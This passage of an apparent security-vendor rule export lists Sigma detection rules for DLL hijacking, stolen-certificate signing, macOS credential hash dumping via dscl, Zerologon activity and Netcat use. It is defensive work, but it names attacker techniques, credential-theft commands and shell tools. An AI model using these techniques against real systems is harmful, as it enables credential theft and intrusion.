"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "97ac274a-41e8-4bf8-8eff-f1707706b244",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098592Z",
"creation_date": "2026-03-23T11:45:34.098594Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098599Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mstsc.yml",
"content": "title: DLL Hijacking via mstsc.exe\nid: 97ac274a-41e8-4bf8-8eff-f1707706b244\ndescription: |\n Detects potential Windows DLL Hijacking via mstsc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mstsc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\credui.dll'\n - '\\CRYPTBASE.DLL'\n - '\\CRYPTUI.dll'\n - '\\explorerframe.dll'\n - '\\IPHLPAPI.DLL'\n - '\\ktmw32.dll'\n - '\\msctf.dll'\n - '\\netapi32.dll'\n - '\\NETUTILS.DLL'\n - '\\shell32.dll'\n - '\\SSPICLI.DLL'\n - '\\version.dll'\n - '\\windows.storage.dll'\n - '\\windowscodecs.dll'\n - '\\WINHTTP.dll'\n - '\\WININET.dll'\n - '\\WKSCLI.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - 
'?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "97ac274a-41e8-4bf8-8eff-f1707706b244",
"rule_name": "DLL Hijacking via mstsc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mstsc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "97be2bc7-8ea3-4c14-ad1e-5cee3597702b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079951Z",
"creation_date": "2026-03-23T11:45:34.079953Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079963Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://x.com/cra0_net/status/1739995773746696386",
"https://attack.mitre.org/techniques/T1553/002/"
],
"name": "t1588_003_suspicious_taketwo_signed_binary.yml",
"content": "title: Suspicious Binary Signed with Take-Two Stolen Certificate\nid: 97be2bc7-8ea3-4c14-ad1e-5cee3597702b\ndescription: |\n Detects the execution of suspicious binaries signed with the Take-Two's stolen certificate.\n In 2023, Take-Two suffered a data-breach and a few gigabytes of data were stolen including an old code-signing certificate.\n Adversaries may use the stolen certificate to sign malicious code and evade AV/EDR detection.\n It is recommended to investigate the binary to determine its legitimacy, for instance by determining whether this file may be part of a legitimate Take-Two Interactive component.\nreferences:\n - https://x.com/cra0_net/status/1739995773746696386\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2023/12/28\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.StolenCertificate\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_displayname:\n ProcessSignature: 'Take-Two Interactive Software, Inc.'\n\n selection_serial:\n ProcessSignatureSignerSerialNumber: '695043D68F15550FD5DB370FA8817B04'\n\n filter_launcher:\n Description:\n - '2K Launcher Agent'\n - '2K Launcher'\n - '2K Launcher Updater'\n Image|endswith:\n - '\\LauncherPatcher.exe'\n - '\\crashagent64.exe'\n - '\\launcher_helper.exe'\n - '\\t2gp.exe'\n - '\\launcher.exe'\n\n condition: 1 of selection_* and not 1 of filter_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "97be2bc7-8ea3-4c14-ad1e-5cee3597702b",
"rule_name": "Suspicious Binary Signed with Take-Two Stolen Certificate",
"rule_description": "Detects the execution of suspicious binaries signed with the Take-Two's stolen certificate.\nIn 2023, Take-Two suffered a data-breach and a few gigabytes of data were stolen including an old code-signing certificate.\nAdversaries may use the stolen certificate to sign malicious code and evade AV/EDR detection.\nIt is recommended to investigate the binary to determine its legitimacy, for instance by determining whether this file may be part of a legitimate Take-Two Interactive component.\n",
"rule_creation_date": "2023-12-28",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "97d348be-3508-4263-a359-6245f34e429c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619498Z",
"creation_date": "2026-03-23T11:45:34.619500Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619504Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://ss64.com/mac/nohup.html",
"https://attack.mitre.org/techniques/T1564/011/"
],
"name": "t1564_011_nohup_execution.yml",
"content": "title: Suspicious nohup Execution\nid: 97d348be-3508-4263-a359-6245f34e429c\ndescription: |\n Detects the execution of a command using nohup in a suspicious execution context.\n On macOS, the nohup binary allows a usre to run a command with hangup signals (SIGHUP) ignored.\n Adversaries may invoke processes using nohup to continue execution through system events that would otherwise terminate its execution, such as users logging off or the termination of its C2 network connection.\n It is recommended to analyze the execution context around the nohup process to look for malicious processes.\nreferences:\n - https://ss64.com/mac/nohup.html\n - https://attack.mitre.org/techniques/T1564/011/\ndate: 2024/07/23\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.011\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n ProcessName: 'nohup'\n ProcessAncestors|contains:\n # folder\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes/'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "97d348be-3508-4263-a359-6245f34e429c",
"rule_name": "Suspicious nohup Execution",
"rule_description": "Detects the execution of a command using nohup in a suspicious execution context, i.e. when one of its process ancestors runs from a temporary, shared or mounted location (such as /private/tmp, /Users/Shared or /Volumes).\nOn macOS, the nohup binary allows a user to run a command with hangup signals (SIGHUP) ignored.\nAdversaries may invoke processes using nohup so that they keep running through system events that would otherwise terminate them, such as the user logging off or the termination of their C2 network connection.\nIt is recommended to analyze the execution context around the nohup process to look for malicious processes.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1564.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "97ec299c-263c-47ff-89c3-59ff26744ee4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098983Z",
"creation_date": "2026-03-23T11:45:34.098986Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098990Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html/",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/",
"https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/",
"https://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_explorer.yml",
"content": "title: DLL Hijacking via EXPLORER.exe\nid: 97ec299c-263c-47ff-89c3-59ff26744ee4\ndescription: |\n Detects potential Windows DLL Hijacking via EXPLORER.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html/\n - https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/\n - https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/\n - https://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'EXPLORER.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\apphelp.dll'\n - '\\cscui.dll'\n - '\\explorerframe.dll'\n - '\\mswb7.dll'\n - '\\propsys.dll'\n - '\\structuredquery.dll'\n - '\\windows.storage.dll'\n - 
'\\windows.storage.search.dll'\n - '\\windowscodecs.dll'\n - '\\windowsudk.shellcommon.dll'\n - '\\xmllite.dll'\n - '\\linkinfo.dll'\n - '\\mpr.dll'\n - '\\fxsst.dll'\n - '\\winmm.dll'\n - '\\ntshrui.dll'\n - '\\winhttp.dll'\n - '\\twinapi.dll'\n filter_legitimate_image:\n Image:\n - '?:\\Windows\\explorer.exe'\n - '?:\\Windows\\SysWOW64\\explorer.exe'\n - '?:\\Windows\\System32\\explorer.exe'\n - '?:\\Windows\\WinSxS\\\\*'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation' # cscui.dll\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "97ec299c-263c-47ff-89c3-59ff26744ee4",
"rule_name": "DLL Hijacking via EXPLORER.exe",
"rule_description": "Detects potential Windows DLL Hijacking via EXPLORER.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "980b1b5c-ef5a-4e4f-b611-0ae94ef47b61",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598499Z",
"creation_date": "2026-03-23T11:45:34.598503Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598510Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://embracethered.com/blog/posts/2022/grabbing-and-cracking-macos-hashes/",
"https://attack.mitre.org/techniques/T1555/005/"
],
"name": "t1564_001_creds_dump_dscl.yml",
"content": "title: Credentials Dumped via dscl\nid: 980b1b5c-ef5a-4e4f-b611-0ae94ef47b61\ndescription: |\n Detects the usage of dscl (or defaults) to read the ShadowHashData attribute of accounts stored in the local directory service, located at \"/var/db/dslocal/nodes/Default/users/*\".\n This may be used to dump the hash and salt of a user's account. If an attacker is able to crack these hashes, they may obtain valid credentials.\n It is recommended to check for other suspicious activities by the parent process.\nreferences:\n - https://embracethered.com/blog/posts/2022/grabbing-and-cracking-macos-hashes/\n - https://attack.mitre.org/techniques/T1555/005/\ndate: 2024/07/22\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.005\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.dscl\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n ProcessName:\n - 'defaults'\n - 'dscl'\n CommandLine|contains: 'ShadowHashData'\n\n exclusion_deletion:\n CommandLine|contains: ' -delete '\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "980b1b5c-ef5a-4e4f-b611-0ae94ef47b61",
"rule_name": "Credentials Dumped via dscl",
"rule_description": "Detects the usage of dscl (or defaults) to read the ShadowHashData attribute of accounts stored in the local directory service, located at \"/var/db/dslocal/nodes/Default/users/*\".\nThis may be used to dump the hash and salt of a user's account. If an attacker is able to crack these hashes, they may obtain valid credentials.\nIt is recommended to check for other suspicious activities by the parent process.\n",
"rule_creation_date": "2024-07-22",
"rule_modified_date": "2025-04-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1555.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9818513b-bd56-4baf-83bd-4c6965a49eb0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295180Z",
"creation_date": "2026-03-23T11:45:35.295183Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295189Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1069/001/",
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1069_001_dscl_readall_groups_macos.yml",
"content": "title: Groups Properties Discovered via Dscl\nid: 9818513b-bd56-4baf-83bd-4c6965a49eb0\ndescription: |\n Detects the execution of the dscl command to list all groups and their properties.\n Attackers may use it during the discovery phase of an attack to retrieve all groups and their properties (such as group IDs and inherited permissions).\n It is recommended to investigate the parent process and look for any other potentially malicious actions taken by it.\nreferences:\n - https://attack.mitre.org/techniques/T1069/001/\n - https://attack.mitre.org/techniques/T1033/\ndate: 2022/12/01\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1069.001\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Dscl\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n # dscl . -readall groups\n # dscl . -readall /Groups\n # dscl . -readall /Groups some_property\n Image: '/usr/bin/dscl'\n ParentImage|contains: '?'\n CommandLine|contains|all:\n - 'readall '\n - 'groups'\n\n exclusion_munki:\n - Ancestors|contains: '/Library/MunkiReport/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python'\n - ParentCommandLine|contains: '/usr/local/munkireport/scripts/'\n\n exclusion_mosyle:\n Ancestors|contains: '|/Library/Application Support/Mosyle/MosyleMDM.app/Contents/MacOS/MosyleMDM|'\n\n exclusion_package_script:\n GrandparentCommandLine: '/System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/XPCServices/package_script_service.xpc/Contents/MacOS/package_script_service'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9818513b-bd56-4baf-83bd-4c6965a49eb0",
"rule_name": "Groups Properties Discovered via Dscl",
"rule_description": "Detects the execution of the dscl command to list all groups and their properties.\nAttackers may use it during the discovery phase of an attack to retrieve all groups and their properties (such as group IDs and inherited permissions).\nIt is recommended to investigate the parent process and look for any other potentially malicious actions taken by it.\n",
"rule_creation_date": "2022-12-01",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1069.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "98216765-b1d4-45cd-9711-7c5edcd45264",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086189Z",
"creation_date": "2026-03-23T11:45:34.086191Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086195Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blogs.blackberry.com/en/2021/03/zerologon-to-ransomware",
"https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin",
"https://attack.mitre.org/techniques/T1068/",
"https://attack.mitre.org/techniques/T1210/",
"https://attack.mitre.org/techniques/T1212/"
],
"name": "t1068_zerologon_tool_usage.yml",
"content": "title: Possible Zerologon Exploitation\nid: 98216765-b1d4-45cd-9711-7c5edcd45264\ndescription: |\n Detects the usage of the Reset-ComputerMachinePassword PowerShell cmdlet in a process spawned by services.exe, i.e. launched by a newly created service.\n This can be the result of the exploitation of the CVE-2020-1472 vulnerability (aka Zerologon), an elevation of privilege vulnerability that enables attackers to obtain full domain administrator privileges.\n This cmdlet is used to restore the domain controller’s password after the exploitation of the vulnerability.\n It is recommended to contact system administrators to determine whether this action was legitimate as well as to look for other malicious actions stemming from the services.exe process on the host.\nreferences:\n - https://blogs.blackberry.com/en/2021/03/zerologon-to-ransomware\n - https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin\n - https://attack.mitre.org/techniques/T1068/\n - https://attack.mitre.org/techniques/T1210/\n - https://attack.mitre.org/techniques/T1212/\ndate: 2021/11/05\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - attack.lateral_movement\n - attack.t1210\n - attack.credential_access\n - attack.t1212\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.CVE-2020-1472\n - classification.Windows.Exploit.ZeroLogon\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage: '?:\\Windows\\System32\\services.exe'\n CommandLine|contains: 'Reset-ComputerMachinePassword'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "98216765-b1d4-45cd-9711-7c5edcd45264",
"rule_name": "Possible Zerologon Exploitation",
"rule_description": "Detects the usage of the Reset-ComputerMachinePassword PowerShell cmdlet in a process spawned by services.exe, i.e. launched by a newly created service.\nThis can be the result of the exploitation of the CVE-2020-1472 vulnerability (aka Zerologon), an elevation of privilege vulnerability that enables attackers to obtain full domain administrator privileges.\nThis cmdlet is used to restore the domain controller’s password after the exploitation of the vulnerability.\nIt is recommended to contact system administrators to determine whether this action was legitimate as well as to look for other malicious actions stemming from the services.exe process on the host.\n",
"rule_creation_date": "2021-11-05",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.lateral_movement",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068",
"attack.t1210",
"attack.t1212"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "98269cb0-6fe3-4fda-85c3-84a45160ad01",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590128Z",
"creation_date": "2026-03-23T11:45:34.590132Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590140Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/",
"https://attack.mitre.org/techniques/T1049/",
"https://attack.mitre.org/techniques/T1095/"
],
"name": "t1049_netcat_windows.yml",
"content": "title: Netcat Execution (Windows)\nid: 98269cb0-6fe3-4fda-85c3-84a45160ad01\ndescription: |\n Detects the execution of Netcat (netcat.exe, nc.exe), a networking utility used for reading and writing data across network connections.\n The detection relies on known import hashes and on the binary's file description rather than on its file name, so renamed copies are covered as well.\n Netcat is often abused by attackers for malicious activities such as establishing reverse shells, data transfer, and lateral movement within a network.\n It is recommended to investigate the process executing Netcat, to analyze the command-line arguments for suspicious patterns, to review the network traffic originating from the system, and to check for any unauthorized access or credentials exposure.\n Additionally, ensure that Netcat is being used for legitimate purposes.\nreferences:\n - https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/\n - https://attack.mitre.org/techniques/T1049/\n - https://attack.mitre.org/techniques/T1095/\ndate: 2022/08/17\nmodified: 2025/02/10\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1049\n - attack.command_and_control\n - attack.t1095\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Netcat\n - classification.Windows.Behavior.RemoteShell\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Imphash:\n - '98ce7b6533cbd67993e36dafb4e95946' # nc.exe - 